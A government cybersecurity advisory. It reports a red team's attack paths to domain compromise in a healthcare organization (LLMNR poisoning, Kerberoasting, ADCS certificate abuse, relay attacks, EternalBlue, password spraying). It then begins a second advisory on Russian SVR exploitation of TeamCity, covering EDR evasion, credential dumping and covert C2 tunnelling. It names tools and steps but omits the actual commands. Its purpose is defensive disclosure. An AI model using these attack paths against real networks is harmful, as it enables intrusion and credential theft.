The team’s phishing assessment was unsuccessful because the organization’s defensive tools blocked the execution of the team’s payloads. The payload testing resulted in most of the team’s payloads being blocked by host-based protections through a combination of browser, policy, and antivirus software. Some of the payloads were successfully downloaded to disk without being immediately removed, but upon execution, the antivirus software detected the malicious code and blocked it from running. Some payloads appeared to successfully evade host-based protections but did not create a connection to the command and control (C2) infrastructure, indicating they may have been incompatible with the system or blocked by border protections.
Since none of the payloads successfully connected to the assessment team’s C2 server, the team conducted a credential harvesting phishing campaign. Users were prompted to follow a malicious link within a phishing email under the pretext of verifying tax information and were then taken to a fake login form.
While twelve unique users from the organization submitted credentials through the malicious form, the CISA team was unable to leverage the credentials because they had limited access to external-facing resources. Additionally, the organization had multi-factor authentication (MFA) implemented for cloud accounts. Note: At the time of the assessment, the CISA team’s operating procedures did not include certain machine-in-the-middle attacks that could have circumvented the form of MFA in place. However, it is important to note that tools like Evilginx[1] can be leveraged to bypass non-phishing resistant forms of MFA. Furthermore, if a user executes a malicious file, opening a connection to a malicious actor’s command and control server, MFA will not prevent the actor from executing commands and carrying out actions under the context of that user.
The CISA assessment team did not identify any significant or exploitable conditions from database or wireless testing that may allow a malicious actor to easily compromise the confidentiality, integrity, and availability of the tested environment.
The team did identify default credentials [T1078.001] for multiple web interfaces during web application testing and used default printer credentials while penetration testing. (See the Attack Path 2 section for more information.)
The assessment team starts internal penetration testing with a connection to the organization’s network but without a valid domain account. The team’s goal is to compromise the domain by gaining domain admin or enterprise administrator-level permissions. Generally, the team first attempts to gain domain user access and then escalate privileges until the domain is compromised. This process is called the “attack path”—acquiring initial access to an organization and escalating privileges until the domain is compromised and/or vital assets for the organization are accessed. The attack path requires specialized expertise and is realistic to what adversaries may do in an environment.
For this assessment, the team compromised the organization’s domain through four unique attack paths, and in a fifth attack path the team obtained access to sensitive information.
See the sections below for a description of the team’s attack paths mapped to the MITRE ATT&CK for Enterprise framework. See the Findings section for information on issues that enabled the team to compromise the domain.
The assessment team initiated LLMNR/NBT-NS/mDNS/DHCP poisoning [T1557.001] with Responder[2], which works in two steps:
LLMNR UDP/5355
, NBTNS UDP/137
) [T1040] and under the right conditions spoofs a response to direct the victim host to a CISA-controlled machine on which Responder is running.With this tool, the CISA team captured fifty-five New Technology Local Area Network Manager version 2 (NTLMv2) hashes, including the NTLMv2 hash for a service account. Note: NTLMv2 and other variations of the hash protocol are used for clients to join a domain, authenticate between Active Directory forests, authenticate between earlier versions of Windows operating systems (OSs), and authenticate computers that are not normally a part of the domain.[3] Cracking these passwords may enable malicious actors to establish a foothold in the domain and move laterally or elevate their privileges if the hash belongs to a privileged account.
The service account had a weak password, allowing the team to quickly crack it [T1110.002] and obtain access to the organization’s domain. With domain access, the CISA assessment team enumerated accounts with a Service Principal Name (SPN) set [T1087.002]. SPN is the unique service identifier used by Kerberos authentication[4], and accounts with SPN are susceptible to Kerberoasting.
The CISA team used Impacket’s[5] GetUserSPNs tool to request Ticket-Granting Service (TGS) tickets for all accounts with SPN set and obtained their Kerberos hashes [T1558.003]. Three of these accounts had domain administrator privileges—offline, the team cracked ACCOUNT 1 (which had a weak password).
Using CrackMapExec[6], the assessment team used ACCOUNT 1 [T1078.002] to successfully connect to a domain controller (DC). The team confirmed they compromised the domain because ACCOUNT 1 had READ,WRITE
permissions over the C$
administrative share [T1021.002] (see Figure 1).
To further demonstrate the impact of compromising ACCOUNT 1, the assessment team used it to access a virtual machine interface. If a malicious actor compromised ACCOUNT 1, they could use it to modify, power off [T1529], and/or delete critical virtual machines, including domain controllers and file servers.
The team first mapped the network to identify open web ports [T1595.001], and then attempted to access various web interfaces [T1133] with default administrator credentials. The CISA team was able to log into a printer interface with a default password and found the device was configured with domain credentials to allow employees to save scanned documents to a network share [T1080].
While logged into the printer interface as an administrator, the team 1) modified the “Save as file” configuration to use File Transfer Protocol (FTP) instead of Server Message Block (SMB) and 2) changed the Server Name and Network Path to point to a CISA-controlled machine running Responder [T1557]. Then, the team executed a “Connection Test” that sent the username and password over FTP [T1187] to the CISA machine running Responder, which captured cleartext credentials for a non-privileged domain account (ACCOUNT 2).
Using ACCOUNT 2 and Certipy[7], the team enumerated potential certificate template vulnerabilities found in Active Directory Certificate Services (ADCS). Note: ADCS templates are used to build certificates for different types of servers and other entities on an organization’s network. Malicious actors can exploit template misconfigurations [T1649] to manipulate the certificate infrastructure into issuing fraudulent certificates and/or escalate user privileges to a domain administrator.
The WebServer
template was misconfigured to allow all authenticated users permission to:
Object Control Permissions
with Write Property Principals
set to Authenticated Users
).Enrollment Permissions
including the Authenticated Users
group).EnrolleeSuppliesSubject
set as True
).See Figure 2 for the displayed certificate template misconfigurations.
The template’s Client Authentication
was set to False
, preventing the CISA assessment team from requesting a certificate that could be used to authenticate to a server in the domain. To demonstrate how this misconfiguration could lead to privilege escalation, the assessment team, leveraging its status as a mere authenticated user, briefly changed the WebServer
template properties to set Client Authentication
to True
so that a certificate could be obtained for server authentication, ensuring the property was set back to its original setting of False
immediately thereafter.
The team used Certipy with the ACCOUNT 2 credentials to request a certificate for a Domain Administrator account (ACCOUNT 3). The team then authenticated to the domain controller as ACCOUNT 3 with the generated certificate [T1550] and retrieved the NTLM hash for ACCOUNT 3 [T1003]. The team used the hash to authenticate to the domain controller [T1550.002] and validated Domain Administrator privileges, demonstrating compromise of the domain via the WebServer
template misconfiguration.
The CISA team used a tool called CrackMapExec to spray easily guessable passwords [T1110.003] across all domain accounts and obtained two sets of valid credentials for standard domain user accounts.
The assessment team leveraged one of the domain user accounts (ACCOUNT 4) to enumerate ADCS via Certipy and found that web enrollment was enabled (see Figure 3). If web enrollment is enabled, malicious actors can abuse certain services and/or misconfigurations in the environment to coerce a server to authenticate to an actor-controlled computer, which can relay the authentication to the ADCS web enrollment service and obtain a certificate for the server’s account (known as a relay attack).
The team used PetitPotam [8] with ACCOUNT 4 credentials to force the organization’s domain controller to authenticate to the CISA-operated machine and then used Certipy to relay the coerced authentication attempt to the ADCS web enrollment service to receive a valid certificate for ACCOUNT 5, the domain controller machine account. They used this certificate to acquire a TGT [T1558] for ACCOUNT 5.
With the TGT for ACCOUNT 5, the CISA team used DCSync
to dump the NTLM hash [T1003.006] for ACCOUNT 3 (a Domain Administrator account [see Attack Path 2 section]), effectively leading to domain compromise.
The CISA team identified several systems on the organization’s network that do not enforce SMB signing. The team exploited this misconfiguration to obtain cleartext credentials for two domain administrator accounts.
First, the team used Responder to capture the NTLMv2 hash for a domain administrator account. Next, they used Impacket’s NTLMrelayx tool[9] to relay the authentication for the domain administrator, opening a SOCKS connection on a host that did not enforce SMB signing. The team then used DonPAPI[10] to dump cleartext credentials through the SOCKS connection and obtained credentials for two additional domain administrator accounts.
The CISA team validated the privileges of these accounts by checking for READ,WRITE
access on a domain controller C$
share [T1039], demonstrating Domain Administrator access and therefore domain compromise.
The team did vulnerability scanning [T1046] and identified a server vulnerable to CVE-2017-0144 (an Improper Input Validation [CWE-20] vulnerability known as “EternalBlue” that affects SMB version 1 [SMBv1] and enables remote code execution [see Figure 4]).
The CISA assessment team then executed a well-known EternalBlue exploit [T1210] and established a shell on the server. This shell allowed them to execute commands [T1059.003] under the context of the local SYSTEM
account.
With this local SYSTEM
account, CISA dumped password hashes from a Security Account Manager (SAM) database [T1003.002]. The team parsed the hashes and identified one for a local administrator account. Upon parsing the contents of the SAM database dump, the CISA team identified an NTLM hash for the local administrator account, which can be used to authenticate to various services.
The team sprayed the acquired NTLM hash across a network segment and identified multiple instances of password reuse allowing the team to access various resources including sensitive information with the hash.
The CISA assessments team identified several findings as potentially exploitable vulnerabilities that could compromise the confidentiality, integrity, and availability of the tested environment. Each finding, listed below, includes a description with supporting details. See the Mitigations section for recommendations on how to mitigate these issues.
The CISA team rated their findings on a severity scale from critical to informational (see Table 2).
Severity | Description |
---|---|
Critical |
Critical vulnerabilities pose an immediate and severe risk to the environment because of the ease of exploitation and potential impact. Critical items are reported to the customer immediately. |
High |
Malicious actors may be able to exercise full control on the targeted device. |
Medium |
Malicious actors may be able to exercise some control of the targeted device. |
Low |
The vulnerabilities discovered are reported as items of interest but are not normally exploitable. Many low items reported by security tools are not included in this report because they are often informational, unverified, or of minor risk. |
Informational |
These vulnerabilities are potential weaknesses within the system that cannot be readily exploited. These findings represent areas that the customer should be cognizant of, but do not require any immediate action. |
The CISA assessment team identified four High severity vulnerabilities and one Medium severity vulnerability during penetration testing that contributed to the team’s ability to compromise the domain. See Table 3 for a list and description of these findings.
Issue | Severity | Service | Description |
Poor Credential Hygiene: Easily Crackable Passwords |
High |
Penetration Testing |
As part of their assessment, the team reviewed the organization’s domain password policy and found it was weak because the minimum password length was set to 8 characters. Passwords less than 15 characters without randomness are easily crackable, and malicious actors with minimal technical knowledge can use these credentials to access the related services. The assessment team was able to easily crack many passwords throughout the assessment to move laterally and increase access within the domain. Specifically, the team:
Cracked the password hash (obtained via Kerberoasting) of a domain administrator account and subsequently compromised the domain. (See the Attack Path 1 section.) |
Poor Credential Hygiene: Guessable Credentials |
High |
Penetration Testing |
As part of the penetration test, the assessment team tested to see if one or more services is accessible using a list of enumerated usernames alongside an easily guessed password. The objective is to see if a malicious actor with minimal technical knowledge can use these credentials to access the related services, enabling them to move laterally or escalate privileges. Easily guessable passwords are often comprised of common words, seasons, months and/or years, and are sometimes combined with special characters. Additionally, phrases or names that are popular locally (such as the organization being tested or a local sports teams) may also be considered easily guessable. The team sprayed common passwords against domain user accounts and obtained valid credentials for standard domain users. (See the Attack Path 3 section.) (Cracking was not necessary for this attack.) |
Misconfigured ADCS Certificate Templates |
High |
Penetration Testing |
The team identified a WebServer template configured to allow all authenticated users permission to change the properties of the template and obtain certificates for different users. The team exploited the template to acquire a certificate for a Domain Administrator account (see the Attack Path 2 section). |
Unnecessary Network Services Enabled |
High |
Penetration Testing |
Malicious actors can exploit security vulnerabilities and misconfigurations in network services, especially legacy services. The assessment team identified legacy name resolution protocols (e.g., NetBIOS, LLMNR, mDNS) enabled in the network, and abused LLMNR to capture NTLMv2 hashes, which they then cracked and used for domain access. (See the Attack Path 1 section.) The team also identified an ADCS server with web enrollment enabled and leveraged it to compromise the domain through coercion and relaying. (See Attack Path 3 section.) Additionally, the team identified hosts with |
Elevated Service Account Privileges |
High |
Penetration Testing |
Applications often require user accounts to operate. These user accounts, which are known as service accounts, often require elevated privileges. If an application or service running with a service account is compromised, an actor may have the same privileges and access as the service account. The CISA team identified a service account with Domain Administrator privileges and used it to access the domain after cracking its password (See the Attack Path 1 section). |
SMB Signing Not Enabled |
High |
Penetration Testing |
The CISA team identified several systems on the organization’s network that do not enforce SMB signing and exploited this for relayed authentication to obtain cleartext credentials for two domain administrator accounts. |
Insecure Default Configuration: Default Credentials |
Medium |
Web Application Assessment |
Many off-the-shelf applications are released with built-in administrative accounts using predefined credentials that can often be found with a simple web search. Malicious actors with minimal technical knowledge can use these credentials to access the related services. During testing, the CISA team identified multiple web interfaces with default administrator credentials and used default credentials for a printer interface to capture domain credentials of a non-privileged domain account. (See the Attack Path 2 section.) |
In addition to the issues listed above, the team identified three High and seven Medium severity findings. These vulnerabilities and misconfigurations may allow a malicious actor to compromise the confidentiality, integrity, and availability of the tested environment. See Table 4 for a list and description of these findings.
Issue | Severity | Service | Description |
Poor Credential Hygiene: Password Reuse for Administrator and User Accounts |
High |
Penetration Testing |
Elevated password reuse is when an administrator uses the same password for their user and administrator accounts. If the user account password is compromised, it can be used to gain access to the administrative account. The assessment team identified an instance where the same password was set for an admin user’s administrative account as well as their standard user account. |
Poor Credential Hygiene: Password Reuse for Administrator Accounts |
Medium |
Penetration Testing |
If administrator passwords are the same for various administrator accounts, malicious actors can use the password to access all systems that share this credential after compromising one account. The assessment team found multiple instances of local administrator accounts across various systems using the same password. |
Poor Patch Management: Out-of-Date Software |
High |
Penetration Testing |
Patches and updates are released to address existing and emerging security vulnerabilities, and failure to apply the latest leaves systems open to attack with publicly available exploits. (The risk presented by missing patches and updates depends on the severity of the vulnerability). The assessment team identified several unpatched systems including instances of CVE-2019-0708 (known as “BlueKeep”) and EternalBlue. The team was unable to successfully compromise the systems with BlueKeep, but they did exploit EternalBlue on a server to implant a shell on a server with local |
Poor Patch Management: Unsupported OS or Application |
High |
Penetration Testing |
Using software or hardware that is no longer supported by the vendor poses a significant security risk because new and existing vulnerabilities are no longer patched). There is no way to address security vulnerabilities on these devices to ensure that they are secure. The overall security posture of the entire network is at risk because an attacker can target these devices to establish an initial foothold into the network. The assessment team identified end-of-life (EOL) Windows Server 2008 R2 and Windows Server 2008 and Windows 5.1. |
Use of Weak Authentication Measures |
Medium |
Penetration Testing |
Applications may have weak or broken mechanisms to verify user identity before granting user access to protected functionalities. Malicious actors can exploit these to bypass authentication and gain access to use application resources and functionality. The assessment team abused the Cisco Smart Install protocol to obtain configuration files for several Cisco devices on the organization’s network. These files contained encrypted Cisco passwords. (The CISA team was unable to crack these passwords within the assessment timeframe.) |
PII Disclosure |
Medium |
Penetration Testing |
The assessment team identified an unencrypted Excel file containing PII on a file share. |
Hosts with Unconstrained Delegation Enabled Unnecessarily |
Medium |
Penetration Testing |
The CISA team identified two systems that appeared to be configured with Although the assessment team was unable to fully exploit this configuration because they lost access to one of the vulnerable hosts, it could have led to domain compromise under the right circumstances. |
Cleartext Password Disclosure |
Medium |
Penetration Testing |
Storing passwords in cleartext is a security risk because malicious actors with access to these files can use them. The assessment team identified several unencrypted files on a file share containing passwords for various personal and organizational accounts. |
Insecure File Shares |
Medium |
Penetration Testing |
Access to sensitive data (e.g., data related to business functions, IT functions, and/or personnel) should be restricted to only certain authenticated and authorized users. The assessment team found an unsecured directory on a file share with sensitive IT information. The directory was accessible to all users in the domain group. Malicious actors with user privileges could access and/or exfiltrate this data. |
The CISA team identified one Informational severity within the organization’s networks and systems. These issues may allow a malicious actor to compromise the confidentiality, integrity, and availability of the tested environment, but are not readily exploitable. The information provided is to encourage the stakeholder to investigate these issues further to adjust their environments or eliminate certain aspects as needed, but the urgency is low.
Issue | Severity | Service | Description |
Overly Permissive Accounts |
Informational |
Penetration Testing |
Account privileges are intended to control user access to host or application resources to limit access to sensitive information in support of a least-privilege security model. When user (or other) accounts have high privileges, users can see and/or do things they normally should not, and malicious actors can exploit this to access host and application resources. The assessment team identified Active Directory objects where the |
The CISA team noted the following business, technical, and administrative components that enhanced the network security posture of the tested environment:
CISA recommends HPH Sector and other critical infrastructure organizations implement the mitigations in Table 6 to mitigate the issues listed in the Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Issue | Recommendation |
---|---|
Poor Credential Hygiene: Easily Crackable Passwords |
|
Poor Credential Hygiene: Guessable Credentials |
|
Misconfigured ADCS Certificate Templates |
|
Unnecessary Network Services Enabled |
|
Elevated Service Account Privileges |
|
SMB Signing Not Enabled |
|
Insecure Default Configuration: Default Credentials |
|
Poor Credential Hygiene: Password Reuse for Administrator and User Accounts |
|
Poor Credential Hygiene: Password Reuse for Administrator Accounts |
|
Poor Patch Management: Out-of-Date Software |
|
Poor Patch Management: Unsupported OS or Application |
|
Use of Weak Authentication Measures |
|
PII Disclosure |
|
Hosts with Unconstrained Delegation Enabled Unnecessarily |
|
Cleartext Password Disclosure |
|
Insecure File Shares |
|
Additionally, CISA recommends that HPH sector organizations implement the following strategies to mitigate cyber threats:
For more information on these mitigations strategies, see CISA’s Healthcare and Public Health Sector webpage.
The above mitigations apply to HPH sector and other critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of the majority of these flaws, and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team:
These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see the joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations.
In addition to applying the listed mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
[1] Github | kgretzky / evilginx
[2] Github | lgandx / Responder
[3] Network security LAN Manager authentication level - Windows Security | Microsoft Learn
[4] Service principal names - Win32 apps | Microsoft Learn
[5] Github | fortra / impacket
6] Github | byt3bl33d3r / CrackMapExec
[7] Github | ly4k / Certipy
[8] Github | topotam / PetitPotam
[9] Github | fortra / impacket / examples
[10] Github | login-securite / DonPAPI
[11] SP 800-63B, Digital Identity Guidelines: Authentication and Lifecycle Management | CSRC (nist.gov)
Reconnaissance |
||
---|---|---|
Technique Title |
ID |
Use |
Active Scanning: Scanning IP Blocks |
The CISA team first mapped the network to identify open web ports. |
Initial Access |
||
---|---|---|
Technique Title |
ID |
Use |
Valid Accounts: Default Accounts |
The CISA team did identify default credentials for multiple web interfaces during web application testing and used default printer credentials while penetration testing. |
|
External Remote Services |
The CISA team attempted to access various web interfaces with default administrator credentials. |
Execution |
||
---|---|---|
Technique Title |
ID |
Use |
Command-Line Interface |
The CISA team accessed a virtual machine interface enabling them to modify, power off, and/or delete critical virtual machines including domain controllers, file servers, and servers. |
|
Command and Scripting Interpreter: Windows Command Shell |
The CISA team used a webshell that allowed them to execute commands under the context of the local |
Privilege Escalation |
||
---|---|---|
Technique Title |
ID |
Use |
Valid Accounts: Domain Accounts |
The CISA team used CrackMapExec to use ACCOUNT 1 to successfully connect to a domain controller (DC). |
Defense Evasion |
||
---|---|---|
Technique Title |
ID |
Use |
Use Alternate Authentication Material |
The CISA team authenticated to the domain controller as ACCOUNT 3 with the generated certificate. |
Credential Access |
||
---|---|---|
Technique Title |
ID |
Use |
LLMNR/NBT-NS Poisoning and Relay |
The CISA team initiated a LLMNR/NBT-NS/mDNS/DHCP poisoning tool to spoof a connection to the organization’s server for forced access. |
|
Brute Force: Password Cracking |
The CISA team cracked a service account with a weak password, giving them access to it. |
|
Steal or Forge Kerberos Tickets: Kerberoasting |
The CISA team gained access to domain accounts because any domain user can request a TGS ticket for domain accounts. |
|
Adversary-in-the-Middle |
The CISA team modified the “Save as file” configuration, to use File Transfer Protocol (FTP) instead of Server Message Block (SMB) and changed the Server Name and Network Path to point to a CISA-controlled machine running Responder. |
|
Forced Authentication |
The CISA team executed a “Connection Test” that sent the username and password over FTP. |
|
Steal or Forge Authentication Certificates |
The CISA team used |
|
OS Credential Dumping |
The CISA team retrieved the NTLM hash for ACCOUNT 3. |
|
Use Alternate Authentication Material: Pass the Hash |
The CISA team used the hash to authenticate to the domain controller and validated Domain Administrator privileges, demonstrating compromise of the domain. |
|
Brute Force: Password Spraying |
The CISA team used a tool called |
|
Steal or Forge Kerberos Tickets |
The CISA team used this certificate to acquire a TGT for ACCOUNT 5. |
|
OS Credential Dumping: DCSync |
The CISA team used |
|
OS Credential Dumping: Security Account Manager |
The CISA team dumped password hashes from a Security Account Manager (SAM) database. |
Discovery |
||
---|---|---|
Technique Title |
ID |
Use |
Network Sniffing |
The CISA team spoofed a response to direct the victim host to a CISA-controlled machine on which Responder is running. |
|
Account Discovery: Domain Account |
The CISA team enumerated accounts with a Service Principal Name (SPN) set with their domain access. |
|
Network Service Scanning |
The CISA team canned the organization’s network to identify open web ports to see where they could leverage the default credentials they had. |
Lateral Movement |
||
---|---|---|
Technique Title |
ID |
Use |
Remote Services |
The CISA team exploited its Responder to perform malicious functions, such as stealing credentials or opening a session on a targeted host. |
|
SMB/Windows Admin Shares |
The CISA team confirmed they compromised the domain because ACCOUNT 1 had |
|
Taint Shared Content |
The CISA team found the device was configured with domain credentials to allow employees to save scanned documents to a network share. |
|
Exploitation of Remote Services |
The CISA team then executed a well-known EternalBlue exploit and established a shell on the server. |
Collection |
||
---|---|---|
Technique Title |
ID |
Use |
Data from Network Shared Drive |
The CISA team obtained credentials for cleartext, hashes, and from files. |
Collection |
||
---|---|---|
Technique Title |
ID |
Use |
System Shutdown/Reboot |
The CISA team assessed that with ACCOUNT 1, they could use it to modify, power off, and/or delete critical virtual machines, including domain controllers and file servers. |
December 14, 2023: Initial version.
]]>The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.
Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA. If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to the FBI and CISA.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
SVR cyber operations pose a persistent threat to public and private organizations’ networks globally. Since 2013, cybersecurity companies and governments have reported on SVR operations targeting victim networks to steal confidential and proprietary information. A decade later, the authoring agencies can infer a long-term targeting pattern aimed at collecting, and enabling the collection of, foreign intelligence, a broad concept that for Russia encompasses information on the politics, economics, and military of foreign states; science and technology; and foreign counterintelligence. The SVR also conducts cyber operations targeting technology companies that enable future cyber operations.
A decade ago, public reports about SVR cyber activity focused largely on the SVR’s spear phishing operations, targeting government agencies, think tanks and policy analysis organizations, educational institutions, and political organizations. This category of targeting is consistent with the SVR’s responsibility to collect political intelligence, the collection of which has long been the SVR’s highest priority. For the Russian Government, political intelligence includes not only the development and execution of foreign policies, but also the development and execution of domestic policies and the political processes that drive them. In December 2016, the U.S. Government published a Joint Analysis Report titled “GRIZZLY STEPPE – Russian Malicious Cyber Activity,” which describes the SVR’s compromise of a U.S. political party leading up to a presidential election. The SVR’s use of spear phishing operations are visible today in its ongoing Diplomatic Orbiter campaign, primarily targeting diplomatic agencies. In 2023, SKW and CERT.PL published a Joint Analysis Report describing tools and techniques used by the SVR to target embassies in dozens of countries.
Less frequently, reporting on SVR cyber activity has addressed other aspects of the SVR’s foreign intelligence collection mission. In July 2020, U.S., U.K., and Canadian Governments jointly published an advisory revealing the SVR’s exploitation of CVEs to gain initial access to networks, and its deployment of custom malware known as WellMess, WellMail, and Sorefang to target organizations involved in COVID-19 vaccine development. Although not listed in the 2020 advisory did not mention it, the authoring agencies can now disclose that the SVR’s WellMess campaign also targeted energy companies. Such biomedical and energy targets are consistent with the SVR’s responsibility to support the Russian economy by pursuing two categories of foreign intelligence known as economic intelligence and science and technology.
In April 2021, the U.S. Government attributed a supply chain operation targeting the SolarWinds information technology company and its customers to the SVR. This attribution marked the discovery that the SVR had, since at least 2018, expanded the range of its cyber operations to include the widespread targeting of information technology companies. At least some of this targeting was aimed at enabling additional cyber operations. Following this attribution, the U.S. and U.K. Governments published advisories highlighting additional SVR TTPs, including its exploitation of various CVEs, the SVR’s use of “low and slow” password spraying techniques to gain initial access to some victims’ networks, exploitation of a zero-day exploit, and exploitation of Microsoft 365 cloud environments.
In this newly attributed operation targeting networks hosting TeamCity servers, the SVR demonstrably continues its practice of targeting technology companies. By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers. JetBrains issued a patch for this CVE in mid-September 2023, limiting the SVR’s operation to the exploitation of unpatched, Internet-reachable TeamCity servers. While the authoring agencies assess the SVR has not yet used its accesses to software developers to access customer networks and is likely still in the preparatory phase of its operation, having access to these companies’ networks presents the SVR with opportunities to enable hard-to- detect command and control (C2) infrastructure.
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. While SVR followed a similar playbook in each compromise, they also adjusted to each operating environment and not all presented steps or actions below were executed on every host.
The SVR started to exploit Internet-connected JetBrains TeamCity servers [T1190] in late September 2023 using CVE-2023-42793, which enables the insecure handling of specific paths allowing for bypassing authorization, resulting in arbitrary code execution on the server. The authoring agencies' observations show that the TeamCity exploitation usually resulted in code execution [T1203] with high privileges granting the SVR an advantageous foothold in the network environment. The authoring agencies are not currently aware of any other initial access vector to JetBrains TeamCity currently being exploited by the SVR.
Initial observations show the SVR used the following basic, built-in commands to perform host reconnaissance [T1033],[T1059.003],[T1592.002]:
Additionally, the authoring agencies have observed the SVR exfiltrating files [T1041] which may provide insight into the host system’s operating system:
Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]:
To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” [T1068] technique to disable or outright kill endpoint detection and response (EDR) and antivirus (AV) software [T1562.001].
This was done using an open source project called “EDRSandBlast.” The authoring agencies have observed the SVR using EDRSandBlast to remove protected process light (PPL) protection, which is used for controlling and protecting running processes and protecting them from infection. The actors then inject code into AV/EDR processes for a small subset of victims [T1068]. Additionally, executables that are likely to be detected (i.e. Mimikatz) were executed in memory [T1003.001].
In several cases SVR attempted to hide their backdoors via:
To avoid detection by network monitoring, the SVR devised a covert C2 channel that used Microsoft OneDrive and Dropbox cloud services. To further enable obfuscation, data exchanged with malware via OneDrive and Dropbox were hidden inside randomly generated BMP files [T1564], illustrated below:
To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLMHash registry key modification, and the Mimikatz tool.
The SVR modified the NoLMHash registry using the following reg command:
The SVR used the following Mimikatz commands [T1003]:
The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors. Depending on the privileges the SVR had, their executables were stored in one of following directories:
The SVR made all modifications using the schtasks.exe binary. It then had multiple variants of arguments passed to schtasks.exe, which can be found in Appendix B – Indicators of Compromise.
To secure long-term access to the environment, the SVR used the Rubeus toolkit to craft Ticket Granting Tickets (TGTs) [T1558.001].
The SVR exfiltrated the following Windows Registry hives from its victims [T1003]:
In order to exfiltrate Windows Registry, the SVR saved hives into files [T1003.002], packed them, and then exfiltrated them using a backdoor capability. it used “reg save” to save SYSTEM, SAM and SECURITY registry hives, and used powershell to stage .zip archives in the C:WindowsTemp directory.
In a few specific cases, the SVR used the SharpChromium tool to obtain sensitive browser data such as session cookies, browsing history, or saved logins.
SVR also used DSInternals open source tool to interact with Directory Services. DSInternals allows to obtain a sensitive Domain information.
After the SVR built a secure foothold and gained an awareness of a victim’s TeamCity server, it then focused on network reconnaissance [T1590.004]. The SVR performed network reconnaissance using a mix of built-in commands and additional tools, such as port scanner and PowerSploit, which it launched into memory [T1046]. The SVR executed the following PowerSploit commands:
In selected environments the SVR used an additional tool named, “rr.exe”—a modified open source reverse socks tunneler named Rsockstun—to establish a tunnel to the C2 infrastructure [T1572].
The authoring agencies are aware of the following infrastructure used in conjunction with “rr.exe”:
The SVR executed Rsockstun either in memory or using the Windows Management Instrumentation Command Line (WMIC) [T1047] utility after dropping it to disk:
The SVR used WMIC to facilitate lateral movement [T1047],[T1210].
The SVR also modified DisableRestrictedAdmin key to enable remote connections [T1210].
It modified Registry using the following reg command:
In the course of the TeamCity operation, the SVR used multiple custom and open source available tools and backdoors. The following custom tools were observed in use during the operation:
While the GraphicalProton backdoor has remained mostly unchanged over the months we have been tracking it, to avoid detection the adversary wrapped the tool in various different layers of obfuscation, encryption, encoders, and stagers. Two specific variants of GraphicalProton “packaging” are especially noteworthy – a variant that uses DLL hijacking [T1574.002] in Zabbix as a means to start execution (and potentially provide long-term, hard-to-detect access) and a variant that masks itself within vcperf [T1036], an open-source C++ build analysis tool from Microsoft.
See below tables for all referenced threat actor tactics and techniques in this advisory. For additional mitigations, see the Mitigations section.
Technique Title | ID | Use |
---|---|---|
Gather Victim Network Information: Network Topology |
SVR cyber actors may gather information about the victim’s network topology that can be used during targeting. |
|
Gather Victim Host Information: Software |
SVR cyber actors may gather information about the victim’s host networks that can be used during targeting. |
Technique Title | ID | Use |
---|---|---|
Exploit Public-Facing Application |
SVR cyber actors exploit internet-connected JetBrains TeamCity server using CVE-2023-42793 for initial access. |
Technique Title | ID | Use |
